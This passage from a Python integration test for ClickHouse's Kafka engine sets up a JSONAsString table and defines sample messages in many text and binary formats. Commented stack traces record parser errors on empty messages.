producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='kafka_json_as_string', key='xxx')
producer.flush()
instance.query('''
CREATE TABLE test.kafka (field String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_json_as_string',
kafka_group_name = 'kafka_json_as_string',
kafka_format = 'JSONAsString',
kafka_flush_interval_ms=1000;
''')
result = instance.query('SELECT * FROM test.kafka;')
expected = '''\
{"t": 123, "e": {"x": "woof"} }
{"t": 124, "e": {"x": "test"} }
{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}
'''
assert TSV(result) == TSV(expected)
assert instance.contains_in_log(
"Parsing of message (topic: kafka_json_as_string, partition: 0, offset: [0-9]*) return no rows")
def test_kafka_formats(kafka_cluster):
schema_registry_client = CachedSchemaRegistryClient('http://localhost:{}'.format(kafka_cluster.schema_registry_port))
# data was dumped from clickhouse itself in the following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
],
'supports_empty_value': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
],
'supports_empty_value': True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# ''
# On empty message exception: Cannot parse input: expected '[' at end of stream., Stack trace (when copying this message, always include the lines below):
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/JSONCompactEachRowRowInputFormat.cpp:0: DB::JSONCompactEachRowRowInputFormat::readPrefix() @ 0x1dee6bd6 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# ''
# On empty message exception: Unexpected end of stream while reading key name from TSKV format
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:88: DB::readName(DB::ReadBuffer&, StringRef&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&) @ 0x1df8c098 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:114: DB::TSKVRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df8ae3e in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
],
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# '',
# On empty message exception happens: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:583: void DB::readCSVStringInto<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > >(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c961e1 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:678: DB::readCSVString(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c8dfae in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CSVRowInputFormat.cpp:170: DB::CSVRowInputFormat::readPrefix() @ 0x1dec46f7 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
],
'supports_empty_value': True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# '',
# On empty message exception happens: Cannot parse input: expected '\n' at end of stream.
# /src/IO/ReadHelpers.cpp:84: DB::throwAtAssertionFailed(char const*, DB::ReadBuffer&) @ 0x15c8d8ec in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:24: DB::skipTSVRow(DB::ReadBuffer&, unsigned long) @ 0x1df92fac in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:168: DB::TabSeparatedRowInputFormat::readPrefix() @ 0x1df92df0 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
# 'Template' : {
# 'data_sample' : [
# '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '' # tolerates
# ],
# 'extra_settings': ", format_template_row='template_row.format'"
# },
'Regexp': {
'data_sample': [
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# ''
# On empty message exception happens: Line "" doesn't match the regexp.: (at row 1)
# /src/Processors/Formats/Impl/RegexpRowInputFormat.cpp:140: DB::RegexpRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df82fcb in /usr/bin/clickhouse
],
'extra_settings': r", format_regexp='\(id = (.+?), blockNo = (.+?), val1 = \"(.+?)\", val2 = (.+?), val3 = (.+?)\)', format_regexp_escaping_rule='Escaped'"
},
## BINARY FORMATS
# dumped with
# clickhouse-client ... | xxd -ps -c 200 | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# ''
# On empty message exception happens: DB::Exception: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/VarInt.h:135: void DB::readVarUIntImpl<false>(unsigned long&, DB::ReadBuffer&) @ 0x15c68bb7 in /usr/bin/clickhouse
# /src/IO/VarInt.h:149: DB::readVarUInt(unsigned long&, DB::ReadBuffer&) @ 0x15c68844 in /usr/bin/clickhouse
# /src/DataStreams/NativeBlockInputStream.cpp:124: DB::NativeBlockInputStream::readImpl() @ 0x1d3e2778 in /usr/bin/clickhouse
# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/NativeFormat.h:42: DB::NativeInputFormatFromNativeBlockInputStream::generate() @ 0x1df1ea79 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'MsgPack': {
'data_sample': [
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x01\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x02\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x03\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x04\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x05\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x06\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x07\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x08\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x09\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0a\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0b\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0c\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0d\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0e\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0f\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
# ''
# On empty message exception happens: Unexpected end of file while parsing msgpack object.: (at row 1)
# coming from Processors/Formats/Impl/MsgPackRowInputFormat.cpp:170
],
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# On empty message exception happens: DB::Exception: Cannot read all data. Bytes read: 0. Bytes expected: 8.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:108: void DB::readPODBinary<long>(long&, DB::ReadBuffer&) @ 0x15c67715 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:737: std::__1::enable_if<is_arithmetic_v<long>, void>::type DB::readBinary<long>(long&, DB::ReadBuffer&) @ 0x15e7afbd in /usr/bin/clickhouse
# /src/DataTypes/DataTypeNumberBase.cpp:180: DB::DataTypeNumberBase<long>::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cace581 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# !!! On empty message segfault: Address not mapped to object
# /contrib/FastMemcpy/FastMemcpy.h:666: memcpy_fast @ 0x21742d65 in /usr/bin/clickhouse
# /contrib/FastMemcpy/memcpy_wrapper.c:5: memcpy @ 0x21738235 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:145: DB::ReadBuffer::read(char*, unsigned long) @ 0x15c369d7 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:155: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c68878 in /usr/bin/clickhouse
# /src/DataTypes/DataTypeString.cpp:84: DB::DataTypeString::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cad12e7 in /usr/bin/clickhouse
